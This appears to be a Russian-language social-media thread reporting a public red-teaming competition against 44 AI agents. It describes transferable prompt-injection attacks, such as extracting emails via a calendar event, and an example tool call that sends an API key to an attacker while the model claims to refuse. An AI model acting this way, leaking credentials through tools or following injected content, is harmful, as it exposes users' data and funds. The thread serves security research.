Мы развернули 44 ИИ-агента и предложили интернету 170 тысяч долларов, чтобы атаковать их. 1,8 миллиона попыток, 62 тысячи нарушений, включая утечку данных и финансовые потери. 🚨 Что тревожно, те же уязвимости переносятся на живых производственных агентов… (например: экстракция электронных писем через событие в календаре) 🧵
Многие сбои универсальны и передаваемы. Шаблоны копирования и вставки работали в разных задачах, моделях и ограничениях. Если это ломает одного агента сегодня, вероятно, это сломает и вашего.
Любимая неудача: "отказаться в тексте, действовать в инструментах." 😈 Модель: "Я не могу поделиться учетными данными." Затем: send_email(to=attacker, body="API_KEY=****") Интерфейс выглядит безопасным; уровень инструментов наносит ущерб.
489,95K